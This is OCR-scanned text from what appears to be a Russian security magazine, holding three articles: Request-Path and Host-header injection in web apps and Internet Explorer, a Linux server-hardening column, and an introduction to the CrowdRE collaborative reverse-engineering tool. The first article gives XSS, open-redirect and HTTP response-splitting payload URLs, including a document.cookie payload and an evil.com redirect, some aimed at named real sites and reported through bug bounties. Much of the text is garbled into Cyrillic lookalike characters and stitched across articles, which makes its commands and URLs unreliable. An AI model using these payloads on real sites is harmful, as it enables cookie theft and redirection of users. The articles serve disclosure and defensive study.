бежать кодирования РериезІ-иРІ. 

ДЕТЕКТИРОВАНИЕ 

В большинстве случаев если веб-приложение использует РедиезМІРІІ для формирования 
контента НТТР-ответа, то это происходит повсеместно, поэтому для обнаружения таких 
проблем достаточно послать от одного до пяти запросов. Первым запросом проверяется, 
поддерживает ли веб-сервер нормализацию пути, в случае если в Редиезі-Раііі содержат- 
ся раШ ІгаѵегзаІ конструкции. 

С Е Т/ [ и п і ци е_з -Іг і ] / . . / НТТ Р/ 1 . 1 



Несмотря на наличие дополнительных условий, данный ва- 
риант не является надуманным и периодически встречается 
в реальных приложениях. 

Сго88 8Ке Зсгірііпд 

Пример 1 

<5сгір-1>ѵагиг1 = ' [Кеяие5-1:-Ра1:Іі] ' ; </зсгір1:> 

Эксплуатация: 

1т11:р : //ехатріе . сот/ ' +а1ег-1 (сіоситепі: . 
соокіе)+’/%2Е%2Е 



Результат : 

<5сгір1:>ѵагцг1 = \ \+а1ег^(гіоситеп1:. 
соокіе)+ 7%2Е%2Е ' ^ </5СПІр1:> 



Остальные запросы отсылаются в зависимости от того, присутствует ли в НТТР-ответе 
[ипідие_з1гіпд] и в какой именно части ответа эта строка находится. 

При этом необходимо уделить особое внимание сценариям перенаправления (с 
/Тоібег на /Ысіег/, с ехатріе. сот на ѵѵѵѵѵѵ.ехатріе.сот, с Іі«р на ИПрз) и страницам ото- 
бражения ошибок 4хх, 5хх, так как это наиболее популярные места, подверженные таким 
уязвимостям. 

МІСН080ГПМТЕНЫЕТ ЕХРЮНЕН 

Рассмотрим более подробно особенности обработки заголовка Іосаііоп в Іпіегпеі Ехріогег 
и то, как их можно использовать для эксплуатации уязвимостей. К сожалению, мое пони- 
мание уязвимости не совпало с мнением МісгозоЙ, и они назвали данные особенности об- 
работки ошибкой, а не уязвимостью, несмотря на все мои попытки доказать обратное ;). 
Необходимо заметить, что эта ошибка обработки присутствует во всех протестированных 
версиях браузера Іп^егпеі Ехріогег от 5.5 до 10. 

Некорректная обработка РедиезІ-РаіИ позволяет не только использовать спецсимволы 
без кодирования, но и обходить встроенный Х58-фильтр. Пример: 



Браузеры: 

5а■Рапі^ Іпііегпеі: Ехріогег (используя РТ-2013-04) 

Пример 2 

<1іпк ге1="сапопіса1" Ііге-Р="ІтІ:1:р: //ехатріе. 
сот[Кедиез-Ь-Ра1:Іі1'7> 



Эксплуатация: 

/гесІігес-1:/ ?г=ІгІ;1;р : //ехатріе . сот/" ><іт§/згс= ' х ’ опег 
гог=а1егиі)>/^252Е%252Е/%2 

Результат: 

<1іпк ге1="сапопіса1" Иге-р="1т^1:р: //ехатріе. сот" > 
<іт§/$гс= ’ X ' опеггог=а1егТ(1)>/%2Е%2Е/%2Е%2Е/"/> 



Браузеры: 

Іпіегпеі: Ехріогег (используя РТ-2013-04) 



іпс1ех,35р 

<%= гедие5І:.§е1:Редие5Тикі() %> 
гесІігесТ.ззр 

<% 

гезропзе. 5еп(^КесІігесТ("ІіТ1р://1рса1Ьо5Т/х55/<іп[щ/$ГС=^х\ рпеггог=е. 
а1ег1:(1) >/%2е%2е/%2е%2е /" ) і 

%> 



При обращении к сценарию гесіігесі.ізр произойдет следующий запрос: 

СЕТ /х55/<іт§/5гс= 'х'опеггог=а1егТ(1)>/%2е%2е/%2е%2е/ 

А при формировании ссылки для адресной строки ВедцезІ-РаШ вновь будет обработан и 
раііі ІгаѵегзаІ конструкции будут вырезаны. Таким образом, Х88-фильтр не обнаружит опас- 
ных конструкций и пропустит данный запрос. Также при использовании УВІ-кодированного 
хоста в заголовке Іосаііоп происходит некорректное декодирование, например: 

ІосаТірп : ЬТТр : //%77%77%77%2Е%60%69%63%72%6Р%73%6Р%66%74%2Е%63%6Р%60/Те5і: 



© 1 


\4 


|ь«р://\длллѵ.тісго$оЛ.сот:8080| 


|еп-и$/сІе^аиН.а5рх 






1 : 



Обработка хоста происходит следующим образом: 

1 . Исходный хост 

%77%77%77%2Е%60%69%63%72%6Р%73%6Р%66%74%2Е%63%6Р%60 



I 88 МІСГОБО^ 



Рис. 2. Подделка порта открытой вкладки ІЕ 
через ошибку обработки Іосабоп 



2. иві-декодирование 
ѵлум . ті с го 5 о-РТ . с от 

3. Наложение декодированного значения на оригинальное 
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ІЛІШ.ГПІСГ050-Р1; . сот9%63%72%6Р%73%6Р%бб%74%2Е%63%6Р%60 



ПРИМЕРЫ РЕАЛЬНЫХ 
УЯЗВИМОСТЕЙ 



4. В результате запрос будет отправлен по следующей ссылке: 

Ь^^р://уш . тісго5о;Рі: . сот9сго50-Р1: . сот/ 1 :е 5 І: 

Данную ошибку обработки можно использовать, добавив 
в УРЬкодированное представление хоста символ /. Таким обра- 
зом, запрос будет отправлен на правильно декодированный хост, 
но в ВедиезІ-РаШ и Нозі-заголовке будут некорректные данные, 
полученные в результате наложения декодированного значения 
на оригинальный хост из Ьосаііоп-заголовка, например: 

іпсіех.ззр 

<%= ге^ие51:.§е■^:Ре^ие5Т^КI() %> 

<%= ге^ие5•^:.беТ5егѵегNате() %> 



гесІіпесТ.ззр 

<% 

гезроп5е.5епсІКесІігес1:("ІтІ:1:р://1оса1Ьо5І:%2Рх%2Р%Зсіт§^ 
%2Ррпеггог= ■ аІегТ ( 1) ’ згс=х%Зе%2-Р . %2е%2-Р . %2е%2-Р%3-Р" ) і 
%> 



При обращении к сценарию гес11гес1.]зр будет сформирован 
следующий НТТР-запрос, который будет отправлен на коррек- 
тно обработанный хост: 

СЕТ /х/<іш8/опепгог='а1ег1:(1) ’5гс=х> 

./?Зе%2те%2е%2Т.%2е%2Ш-Р/ НТТР/1.1 
НозТ: 1оса1Ьо5Т/х/<іт§/опеггог='а1егТ(1) 'зге*-* „ 

=х>/. ./../? 

В результате данную ошибку обработки Іосаііоп можно 
использовать, так же как в предыдущем примере, для форми- 
рования произвольных данных в Ре^иез^РаШ и обхода Х55- 
фильтра, а также для реализации атак типа «межсайтовое вы- 
полнение сценариев» через НозЬзаголовок. 

Пример подделки порта для открытой вкладки через ошибку 
декодирования хоста: 

гесІігесТ-Б.ззр 

<% 

гезропзе . зепсІКесІігесІ: ( "ЬТТр : //ѵмѵі . тіегозо-РТ . 
сот%За80/еп-из/сІе-Раи11: . азрх" 

%> 



В данном примере запрос будет отправлен на тіегозой. 
сот: 80, но в адресной строке будет отображаться порт 8080 из- 
за некорректного декодирования. 

ЗАКЛЮЧЕНИЕ 

Несмотря на сложность эксплуатации и довольно специфич- 
ные условия, данные варианты атаки не стоит недооцени- 
вать. Как показала практика, очень многие веб-разработчики 
используют Вериезі-Раііі и Ноз^заголовок без дополнитель- 
ных фильтраций, так как рассчитывают, что при нормальных 
условиях в них не может быть ничего лишнего. Если верить 
моей нерепрезентативной выборке, каждый пятый популяр- 
ный веб-сайт в той или иной мере подвержен рассмотрен- 
ным уязвимостям некорректной обработки данных, получен- 
ных от пользователя. ЗС 



Написав небольшое расширение для Вигр Ргоху, которое модифицирует Рериезі:- 
УРІ и Нозі всех запросов, я решил проверить, насколько распространены перечис- 
ленные уязвимости в реальной жизни. Ниже представлено несколько обнаружен- 
ных примеров в рамках участия в Вид Воипіу программах. 



Ѵапсіех Вид Воипіу 

НТТР Певропве 8рІі1ііпд, Ореп Несіігесі, Х88 ГтаіІ.ѵапбех.ги/пео2 ] 
Сценарий перенаправления с /пео2 на /пео2/ использовал УРЕ-деко- 
дированный РедиезІ-РаШ, полученный от клиента, для формирования 
Іосаііоп-заголовка. 

Ореп Несіігесі: 

Ийр://таіІ.уапсІех.ги//еѵіІ.сот/%2е%2е/пео2 

НТТР Незропзе 8р1ННпд: 

И«р://таіІ.уапсІех.ги/%0а8ег-Соокіе:гезІ=1ез1%0а/%2е%2е/пео2 

Сго85 8Не 8сгір«іпд (для браузеров с отключенным перенаправлением): 
Мйр://таіІ.уапс1ех.ги/%0а%0а/<зсгірІ>аІеі1( 1 )</ 
зсгірІ>/%2е%2е/2е%2е/пео2 

Х88 ^таіІ.ѵапРех.ги/ІіІе ] 

Облегченная версия таіі.уапбех.ги определяла переменную РОА. 

РгеТіх по первой папке Редиез1-Р*аІІі, полученной от клиента, и 
использовала ее в ^аѵа8с^ір1-коде без необходимых обработок. 

• Пример эксплуатации: 

ИПр://таіІ.уапс1ех.ги/х'+аІеП('Х88')+'х/%2е%2е/Іі1е/іпЬох 

• Фрагмент НТТР-ответа: 

РОА.ргеТіх = "+аІеіі('Х88')+": 

Еізу Вид Воипіу 

Х88 ѵіа Нов* [е^зѵ.сот . *. е1зѵз^а1іс.сот ] 

ѴагпізИ НТТР Ассеіегаіог, обрабатывающий запросы к сайтам Еізу, 
имел некорректно настроенный шаблон страницы ошибок. В случае 
неизвестного хоста в НТТР-ответ попадало значение Нозі-заголовка без 
необходимых обработок. 

• Пример эксплуатации (только браузер ІЕ, используя РТ-2013-04): 
Іі«р://еѵіІ.сот/гебігес1?игІ=И«р://е1зу.сот%252Р 
<ітд%2520згс=Ѵопеггог=аІеП( 1 )>%252Е%252е.%252Р 

• Фрагмент НТТР-ответа: 

<ЬосІу>ипкпоѵѵп Ротаіп: еізу.сот/ 

<ітдзгс='х’опеггог=аІеі1( 1 )>/../</ЬосІу></МтІ> 



Ыокіа Вид Воипіу 

НТТР Певропве 8рІі**іпд Гассезз.покіа.сот . 
ргоіесіз.сіеѵеіооег.покіа.сот і 

Сценарий перенаправления с НТТР на НТТР8 использовал УРЬдекоди- 
рованный Ре^иез^Ра^I^, полученный от клиента, для формирования 
Еосаііоп-заголовка. 



- - .. 


СЭ ' Ь«р; І'пд; сіцпізііссот - 3 О { Й ітдЗ.« 5 ѵйЛіс.сот/<іто >, к 






В 

ипкпоп-п (іотаіа; іт$3.еиу$шіс сот .. 


1 Сообщение с веб -страницы Ю| 


► 

о 







Рис. 3 Эксплуатация Х58 через Но8І-заголовок на сайтах Еізу 



• Пример эксплуатации: 

И«р://ассезз.покіа.сот/х%0аНТТР:Резроп8е_8рІі«іпд%0а/ 

Іійр://ргоіес1з.беѵеІорег.покіа.сот/саг1гитрз/х%0аНТТР:%20Резропзе-8рІійіпд/ 

ІЛ Песігевв А**аск ГзиорогІ.риЫізИ.покіа.сот ] 

Для формирования Асііоп формы «СопШеІ Уз» использовался 
РедиезІ-РаШ, полученный от клиента. 

• Пример эксплуатации: 

зирроП. риЫізМ . покіа.сот//еѵіІ .сот/%2е%2е?раде_ісІ= 105 

• Фрагмент НТТР-ответа: 

<1огт асІіоп=’У/еѵіІ.сот/%2е%2е?раде_ісІ=105#ѵѵрсГ7-^5185-р105-оГ 
те!1юб="роз1" сІаз8="ѵѵрсГ7-1огт"> 
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НАПОЕМІМС - 
ПУТЬ САМУРАЯ 



Сегодня мы поговорим о такой важной составляющей ИБ, 
как укрепление сервера (ііагсіепіпд). Мы рассмотрим базовый 
подход к укреплению классического Ііпих-сервера и разбе- 
рем, насколько данный процесс важен и полезен. 



ВВЕДЕНИЕ 

Нагсіепіпд — процесс усиления защищенности 
системы с целью снижения рисков от возмож- 
ных угроз. Данный процесс применяется ко всем 
компонентам системы, тем самым, в идеальном 
случае, делая сервер неприступной крепостью. 
Судя по описанию, штука скучная и нехакерская, 
но, с другой стороны, именно это мы и называем 
процессами ИБ. 

Более того, харденинг — это базис всего 
подхода к защите. Немудрено, что фактически 
именно этот процесс лежит в основе требований 
такого стандарта, как РСІ 088. Во всех организа- 
циях, где ИБ — это не мерзкая обязанность из-за 
того, что какие-то «бумажные специалисты» этого 
требуют, а реальная необходимость, именно хар- 
денинг — один из главных атрибутов любой выка- 
тываемой в продакшн системы. 

МОЯ ПЛАТФОРМА - моя КРЕПОСТЬ 

Допустим, у нас есть система, построенная 
на ипих/АрасІіе/Му801/РНР. Мейнстрим, но мы 
потерпим. Давай предположим, что у нас есть 
фронтенд, торчащий в интернет (Ыпих/АрасИе/ 
РНР), и бэкенд (^іпиx/Му8^^). Мы опустим бэ- 
капы, балансировку и защиту от 00о8 на уров- 
не архитектурных решений, ну и о Му8^^, РНР 
и АрасИе мы поговорим, может быть, потом. Се- 
годня только ОС. 

Здесь и далее: все советы нужно приме- 
нять с умом, то есть надо понимать, на что вли- 
яет та или иная настройка, чтобы финальная 



конфигурация не убила функционал системы. 
В любом случае принцип подхода — отключи то, 
что не нужно, остальное настрой так, чтобы рабо- 
тало согласно требованиям, а не по умолчанию. 
Это относится и к ядру. Все ненужные модули 
можно смело отключить. Тот же принцип и для па- 
кетов — все ненужные сервисы и пакеты можно 
смело отрубить/отключить. 

ЫМиХНАВОЕНІМС 

«Сеть — это компьютер» (с), так что начнем наш 
процесс с настроек ТСР/ІР. В целом еще нет гло- 
бальной поддержки ІРѵб, поэтому можно смело 
отключать поддержку этого протокола на сетевых 
интерфейсах. ІРѴ6 довольно молодой и дырявый 
протокол, лишних проблем сего настройками нам 
не надо, как и лишних угроз. 

^..Проверка ядра 

[ --Р /ргрс/пеТ/іТ_іпеТ6 ] && 

есЬо ’ІРѵб геасіу зуБТеш! ’ 

# Вывод интерфейсов с включенной 

# . П РДД е р ж к о й , . I Р V 6 

ір -о -6 асісіг 

Остальные сетевые настройки: отключим под- 
держку ІСМР-редиректов, форвардинг пакетов, 
ответы на широковещательный пинг — все эти 
чеки можно легко автоматизировать на ЬазИ: 

# Проверяем іпе .. (.не роутер же 

# нас а прр.стр ..сервер, 



і-Р §гер -р -Р "''\5*пе1:\,ірѵ4\...«-' „ 

ір_-Рог\ліагР\5*=\5*1\5*$" /е1:с/5у5СІ:1.і-' 
соп-Р; 1:1іеп есЬо "ІР Рог\л/агсІіп§ ♦-« 
епаЫесІ"; б 

#....Нр..Рдно дело.- в.крн 

#.Аелр в памя.ти,.^ 

# надежнее В крнфиге может быть ничего 

# не . у. казано^ а в 

# текущие настройки: 

і-р ! §гер -ц -Р "''\5*0\5*$" /ргос/5у5/ 
пе1:/ірѵ4/ір_-РогмагсІ; 1:1іеп есЬо ♦-і 
"ІР Ропл/агсІіп§ епаЫеР"; б 



• Проверяем поддержку маршрутизации 

• от источника (проверяем сразу для а11 

• и сІе-РаиІІ и сразу в памяти) 
і-р (! (8гер -р -Р "'^\5*0\5*$" 4-^ 
/ргос/БуБ/пеІ/ірѵА/соп-Р/аІІ/*-* 
ассер1:_5оигсе_гои-1:е && §гер -р -Ре 
"'^\5*0\5*$" /рГОС/5у5/пе1/Ірѵ4/СОП-р/4-« 
сІе-Раи11:/ассер1:_5оигсе_гои1:е)); 1;Ьеп 
есЬо "Боигсе гои-1:іп§ епаЫесІ"; б 

Таким же образом проверяем остальные сете- 
вые настройки: 

• пе-І: . ірѵ4 .сопб. (а11|сІебаи11:).ассерб_ 
гесІігесбБ — ставим О, игнорируем ІСМР- 
редиректы, так как не хотим, чтобы маршрут 
мог быть изменен. 

• пеб.ірѵ4.істр_есЬо_і§поге_ЬгоасІса5І:5 — 
ставим 1, кому нужны широковещательные 
пинги в двадцать первом веке? 

• пе"1:.ірѵ4.істр_і§поге_Ьо§и5_еггог_ 
те$5а§е5 — зачем нам разбирать кривые 
ІСМР-пакеты? Что там может быть хорошего, 
только логи засорять. В топку! 

• пеі: . ірѵ4 . 1:ср_5упсоокіе5 — тут надо ставить 
1 . Классическая защита от 8УN бооб атак, лиш- 
ней не будет :). 
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Колонка Синцова 
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Результат работы утилиты РНР АисШог 



• пе1:.ірѵ4.соп-Р. (а11|сІе-Раи11:) .гр_Я11;ег — 
тут, конечно, 1 . Верификация ІР источника, по- 
лезная фича для защиты от ІР зроо^іпд атак. 

Есть и другие фичи для параноиков, но это 
базовые. Кто-то не любит пинги вообще, а у не- 
которых так ІіеаІШ_сІіеск делается, поэтому здесь 
советовать сложно. Все проверки легко автома- 
тизируются, что полезно, если ты производишь 
автодеплоймент. 

Кое-что про файрвол. Это вопрос архитектуры 
системы: например, если наша машинка работа- 
ет в Амазоне или же вся сетка режется каким-то 
красивым роутером / межсетевым экраном или 
хитрыми ѴІАМ’ами, то ясно, что вся фильтрация 
и логика доступа будет там. Но если мы закиды- 
ваем сервак в непонятный дата-центр, где у нас 
куча других проектов, то возникает угроза гори- 
зонтальных атак в пределах дата-центра. То есть 
наш МуЗОЬсервер не видит инета и его не видно 
из инета, но другие хосты дата-центра его видят. 
В таком варианте локальные правила фильтра- 
ции будут нелишними. Проверить это автоматом 
сложно, так как по умолчанию, особенно если 
проектов много, ты не знаешь, кому какие прави- 
ла доступа требуются, и нужно все внимательно 
изучать и допиливать. Но вот быстрый чек заму- 
тить можно: 

і-р (ір1:аЫе5 -5І^гер -Р (ІМРУТ«-^ 

) I (РОКІаіАКО) I (0иТРиТ))Х5+АССЕРТ$") ; ^ 
•рМеп есЬо "Ѵоиг (ігеѵ\;а11 зиск"; Я 

АККАУНТЫ 

Кроме сети, у нас еще есть стандартные сервисы, 
типа 88Н. Требования здесь достаточно просты: 

• У каждого юзверя свой аккаунт. 

• Админы заходят через свой аккаунт. Если 
нужен ГООІ, аккуратно помещаем их учетки 
в зибоегз. 

• Никаких паролей — вся аутентификация толь- 
ко по ключам. 

• В зибоегз никаких палевных записей, типа 
«Іотсаі АЕІ=МОРА88ѴѴО: /Ьіп/зР -с саі *». 

Большая часть чеков так же легко автоматизи- 
руется, не буду тут это расписывать. 

ФАЙЛОВАЯ СИСТЕМА 

Это самая важная часть. Например, классикой 
жанра является уязвимость ІРІ, и раньше было 



модно инъектить в логи апача РНР-код для даль- 
нейшего ПСЕ. Это, конечно, старый и унылый 
пример, но это показывает силу харденинга. 
Дело в том, что апач у нас пишет логи от рута, 
а вот дочерние процессы (форки) запущены 
с правами непривилегированного пользователя, 
например арасИе. Так вот, в идеальном мире этот 
юзер не должен иметь прав на чтение в директо- 
рии /ѵаг/Іод/ИйрсІ/, что сведет к неудаче попытку 
чтения через ЕРІ (но мы-то, конечно, знаем про 
рИріпЬ и цріоасі-директорию...). И это мини- 
мальный пример. В других примерах есть куча 
директорий и файлов, которые нежелательны 
для доступа другим юзерам, типа арасИе. Это 
различные конфиги, логи и бэкапы, в которых 
может быть чувствительная информация и — 
о нет — персональные данные. Для автоматиза- 
ции этого чека можно запилить скрипт, который 
проверяет права чтения и записи «для всех». Мо- 
жет оказаться полезным. 

Кроме того, имеет смысл сварганить скрипт, 
который ищет чувствительные данные по ФС. 
Зачем это нужно? Очень просто, запускаем этот 
скрипт от юзера апач или даже рута, он мучает- 
ся несколько минут, а затем должен показать, 
что он ничего не нашел в открытом и доступном 
виде. Этот трик применяется всеми вменяемы- 
ми РСІ 088 аудиторами, которые по регекспам 
ищут следы номеров кредитных карт, и если та- 



кой скрипт находит их, то аудитор справедливо 
выписывает пачку люлей :). Соответственно, мы 
определяем, какие данные для нас важны и какие 
данные мы защищаем, затем пишем их фингер- 
принт и чекаем автоматом, что фактически озна- 
чает быструю проверку на тему «не может ли ха- 
кИр, в случае ПСЕ, ІРІ или ІгаѵегзаІ, найти что-то 
ценное». Примеры таких данных: 
маска номеров кредитных карт; 
логины и пароли: 
персональные данные: 
коды активных сессий. 

Кроме того, несмотря на все вышесказан- 
ное, все равно следует проверять /е!с/раззѵ\/сІ, 
/еіс/зИасІоѵѵ, /еіс/дгоир на наличие аккаунтов 
со слабыми паролями (М05-хешами), аккаунтов 
без паролей и проверить все акки с логин-шел- 
лом. Это также легко автоматизируется на баше 
с трепом. 

ЗЕЫЫиХ/АРРАРМОН 

Отдельно хочется сказать про этот слой защиты. 
На самом деле данные системы контроля досту- 
па на уровне ядра являются очень эффективны- 
ми инструментами. Но вот их настройка — дело 
сложное и не всегда тривиальное. Крайне реко- 
мендую озаботиться, но стоит помнить, что лю- 
бые изменения в логике работы системы могут 
быть заблокированы 8еипих/АррАгтог, что при- 
водит к дополнительным проблемам с поддерж- 
кой системы. 

ит.д.,ит.п. 

Продолжать описывать рекомендации можно 
долго: и поиск 811Ю-бит исполняемых бинарни- 
ков, и настройки апача, Му801 — все эти вещи 
должны быть выполнены, но поверь — оно того 
стоит. Даже если программист совершит ошиб- 
ку, даже если атакующий проведет атаку, имен- 
но ИагсІепіпд будет последней надеждой на то, 
что урон окажется минимальным. 

Главный месседж, что я хотел донести: 
ИБ — это не только хак, безопасное програм- 
мирование или слабые пароли, ИБ — это про- 
цесс, и вот эту часть с базовыми настройками 
системы очень многие пропускают — в банках, 
в госучреждениях, в крупных энтерпрайз-ком- 
паниях. Если тебе интересна эта тема и ты хо- 
тел бы помочь в создании единой базы знаний 
по Ііагсіепіпд различных систем и платформ — 
пиши на с)еТсопги55іа@дтаіІ.сот. Может полу- 
читься интересный проект, как по самой базе, так 
и по автоматизации этого дела. □□ 
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Гідег 5есиг1Гу 5СГ1рІ5 *** 3.2.3 
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2і:24> ЗІагГІпд ГІІе зузГепз хсапз 1п Ьаскдгоигиі. . . 

2і:24> СНескІпд ра55мог<1 ГІІез... 

21:24> СНескІпд дгоир ГІІех 

21:24> СНескІпд изег ассоипГз... 

21:24> СНескІпд .гНо$Г$ ГІІех... 

21:24> СНескІпд .пеГгс Г11е$ 
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2і:24> СНескІпд паіі а11а5е5... 

21:24> СНескІпд стоп епГг1е& 
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щуѵѵѵ.табігіз^і.пеі/199 : 
ХарденингМу801: 
ЬіІІѵ/ІЗІзрІіС 
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ЛОМАЕМ 

ВМЕСТЕ 

С каждым годом технологии и вещи вокруг нас стано- 
вятся все сложнее и сложнее. А времени, чтобы разо- 
браться с ними, становится все меньше и меньше. Кто 
первый разобрался и воспользовался — тот и на коне. 
То же самое можно сказать и о мире информационной 
безопасности. Взять, к примеру, антивирусные компа- 
нии: кто первый обнаружил малварь, исследовал ее 
и добавил сигнатуру в свою базу — тот и будет пользо- 
ваться спросом у юзеров. Или пентестеров, которым 
надо за максимально сжатые сроки как можно лучше 
изучить безопасность своей цели. Очевидно, что ре- 
шать такие задачи в максимально короткие сроки 
одному человеку просто не под силу. Поэтому давай 
познакомимся с инструментами, которые используют 
вирусные аналитики / пентестеры / крякеры / хакеры 
для организации совместной командной работы. 

ВСТУПЛЕНИЕ 

Конечно, среди людей встречаются уникумы, способные в оди- 
ночку решать сложные задачи. Теоретически найти мегакруто- 
го реверсора, способного декомпилировать программу в уме, 
можно. Но насколько бы ни был прокачан его скилл, насколько 
бы продуктивно он ни работал, ему все же придется тратить 
какое-то время на еду, сон и прочие радости повседневной 
жизни. К тому же у него всего лишь две руки, два глаза, то есть 
у него вряд ли получится одновременно исследовать несколь- 
ко кусков кода. Короче, кругом одни ограничения, при которых 
выполнить поставленную задачу максимально быстро не полу- 
чится. Надо сказать, что с подобной проблемой столкнулись 
и производители микропроцессоров, настало время, когда 
наращивать частоту процессоров для увеличения вычисли- 
тельных мощностей стало просто нецелесообразно. И они вы- 
брали альтернативный путь — начали увеличивать количество 
ядер. Все просто, двадцать хороших реверсоров проанализи- 
руют код намного быстрей, чем один крутой. Такая же ситуация 
и с коллегами по цеху — пентестерами. Одному человеку про- 
вести полноценный тест на проникновение на крупном объекте 
просто нереально. Прежде всего, ему придется быть специали- 
стом в разных областях ИБ, а во-вторых, ему опять-таки просто 
не хватит времени. Как ни крутись, а от командной работы нику- 
да не денешься. Но работа эта должна быть скоординирована, 
ведь если реверсеры начнут исследовать одни и те же участки 
кода или пентестеры по несколько раз сканировать один и тот 
же объект, то производительности такая командная работа 
не добавит. Именно поэтому были созданы специальные ин- 
струменты, позволяющие сводить работу всех реверсеров/ 
пентестеров воедино. С двумя наиболее яркими представите- 
лями из них мы сегодня и познакомимся. Это СгоѵѵсІРЕ, исполь- 
зующийся для организации совместного реверс-инжиниринга 
приложений, и Огасііз, участвующий в проведении коллектив- 
ных пентестов. 
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СВОѴѴОКЕ 

Тенденции развития популярных зловредов Біихпеі и РІате 
говорят о том, что они становятся все сложней и все боль- 
ше. И если статический анализ какого-нибудь небольшого 
сіоѵѵпіоасіег’а или сігоррег’а для аналитика — дело нескольких 
минут, то на анализ «массивного» бинарника с кучей функцио- 
нала и антиотладочных приемов могут уйти недели, если не ме- 
сяцы человеко-часов. Именно поэтому программное обеспече- 
ние, позволяющее проводить совместный реверс-инжиниринг, 
становится все более востребованным. Все существующие 
на текущий момент инструменты для коллективного анализа 
исполняемых файлов можно условно разделить на две группы 
по принципу их функционирования. Первая — мгновенно син- 
хронизирует все вносимые изменения между всеми членами 
команды. Такой подход удобен для обучения реверси нгу или 
демонстрации на презентации. Вторая группа предоставляет 
возможность работать над различными кусками файла, перио- 
дически делясь плодами своего труда с товарищами. Это по- 
зволяет распределить задачи и дает возможность нескольким 
людям одновременно работать над различными частями фай- 
ла. А результат их работы может быть собран воедино в любое 
время. 

Ко второй группе как раз и относится инструмент, с которым 
мы сегодня познакомимся поближе, — СгоѵѵбРЕ. Чтобы упро- 
стить процесс обратного инжиниринга, компания СгоѵѵсІЗІгіке 
разработала СгоѵѵбРЕ — платформу, позволяющую аналити- 
кам со всего мира выполнять совместный реверс-инжиниринг 
приложений. Устройство этой платформы напоминает систему 
контроля версий — аналитики могут «коммитить» аннотации 
для каждой функции исследуемого файла. СгоѵѵбРЕ состоит 
из облачного сервиса и одноименного плагина для ЮА Рго, по- 
зволяющего использовать этот сервис в связке с самым попу- 
лярным инструментом для анализа исполняемых файлов. Все 
коммиты пользователей сохраняются в облаке и в зависимости 
от выбранных пользователем настроек могут быть доступны 
только тому, кто их загрузил, либо группе лиц, работающих 
над одним файлом, либо вообще всем пользователям серви- 
са. Такой гигант, как (Зоодіе, уже заявил о поддержке проекта 
и планирует добавить интеграцию Сго\л/с1ВЕ в свой инструмент 
обратного инжиниринга зловредов ВіпМаѵі, чтобы позволить 
аналитикам делиться плодами своей работы с сообществом. 

Аннотации для функций, которые могут коммитить анали- 
тики, включают в себя прототип функции (имя, соглашение вы- 
зова, тип возвращаемого значения, имена и типы параметров), 
локальные переменные, структуры, перечисления, коммента- 
рии. То есть в процессе разбора ассемблерного кода аналитик 
старается привести функцию в первозданный вид на ориги- 
нальном языке (С/С++) и посредством облачного сервиса мо- 
жет поделиться результатами с коллегами. Другие аналитики 
могут импортировать эти аннотации в свою локальную ібЬ-базу. 
Причем поддерживается два вида импорта: 

• пакетный, когда для всех проанализированных функций 

загружается самый последний коммит (первое, что надо 
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сделать, приступая к работе над новым 
бинарником, чтобы иметь на руках акту- 
альную версию); 

• индивидуальный, когда происходит им- 
порт аннотации для конкретной функции. 

В этом случае можно выбирать, какую 
версию аннотации грузить (самую по- 
следнюю или какую-то из более ранних). 

Поиск функций, для которых доступны 
аннотации, реализован несколькими спо- 
собами. Первый — Ехасі таІсИіпд, то есть 
полное соответствие. Берется хеш от бинар- 
ного представления функции и ее смещение 
в файле, на основании этих двух параме- 
тров в облаке происходит поиск доступных 
аннотаций. Второй — Рц 22 у таісіііпд, или 
нечеткое соответствие, когда вычисляется 
5НА-1-хеш последовательности мнемоник 
и уже на основании этого хеша ведется по- 
иск соответствующей аннотации. Для чего 
нужен Рц 22 у таІсГііпд? Допустим, ты полно- 
стью разобрал первое поколение червя 
ЗШхпеі Но тут идет новая волна, и надо 
разбираться уже со вторым поколением. 

Очевидно, что сам исполняемый файл зло- 
вреда изменился, функционал расширился, 
но большинство-то основных функций оста- 
лось на месте. Не начинать же опять анализ 
с чистого листа? В данной ситуации Рц 22 у 
таісИіпд позволит сопоставить и загрузить 
аннотации функций из первого поколения 
для соответствующих функций второго поко- 
ления червя, сэкономив таким образом кучу 
времени на анализ нового функционала. 

УСТАНОВКА И НАСТРОЙКА 

Но довольно теории. Можно долго расте- 
каться мыслью по древу, но, как говорится, 
лучше один раз увидеть. Поэтому давай 

опробуем инструмент в деле. Прежде всего необходимо скачать плагин 
для ЮА Рго под конкретную операционную систему (доступны для ѴѴіпсІоѵѵз, 
05 X и Ыпих), сделать это можно тут — ѵ\дѵѵѵ.сгоѵѵсі5! гіке.согп/сгоѵѵс1ге/ 
сіо\л/пІоасІ8 . После чего установить его, скопировав в папку ріидіпз в дирек- 
тории ЮА. На этом все настройки на локальной машине закончены, и оста- 
ется только зарегистрироваться на облачном сервисе СгоѵѵсІРЕ — сго\л/с1ге. 
сгоѵѵб8^гіке.сопп/8іап-іп . СгоѵѵсІРЕ использует сервис аутентификации (Зоодіе, 
поэтому если у тебя есть ящик на СтаіІ, то просто нажми на кнопку «Зідп іп 
ѴѴІ1И Соодіе». Если же нету — придется завести. Залогинившись, первым де- 
лом необходимо сгенерировать аутентификационный токен (АиШепІісаііоп 
Токеп), который плагин СгоѵѵсІРЕ запросит для взаимодействия с сервисом 
при первом использовании. Для этого надо всего лишь нажать на плюсик 
рядом с надписью АиШепІісаІіоп Токепз. Также, если необходимо, чтобы 
к загружаемым аннотациям имели доступ только члены команды, а не все 




Второй аналитик еще 
не обновился, поэтому 
не видит, что функция 
зиЬ_404814уже 
проанализирована 



сюио нем 

в некоторых ситуациях п^теимущества облачного сервиса Сго^РЕ могут оказаться не- 
достатками. Ведь сервис ведет базу всех проанализированных функций, которые под- 
робно разобрали и привели в читабельный вид. Очевидно, что не всем хочется, чтобы 
плоды их исследований были дсютупны третьим лицам. Если твоя хактим занимается 
реверсингом какого-то приватного софта, то будет совсем не круто, если данные о нем 
утекут в Сеть в каком-либо виде Чтобы избежать этого, можно воспользоваться Скхісі 
Меіп - сторонней реализаций СгоѵѵсІРЕ-сервера. который можно развернуть на одной 
из своих машин Как утверждают разработчики, СІоисІ Ыеіп поддерживает все функции 
СгоѵѵсІРЕ. единственная вещь, которая может пока работать некорректно, — это Риггу 
таісіипд В общем, кто-то успешно реверснул протокол обмена данными с СгогсІРЕ- 
сервером. чем теперь можно с радостью воспользоваться. 



СОФТ ДЛЯ СОВМЕСТНОГО 
РЕВЕРСИНГА ПРИЛОЖЕНИЙ 

СгоѵѵсІРЕ — не единственная возможность 
совместно анализировать исполняе- 
мые файлы. Как только малварь стала 
становиться все сложнее и сложнее, 
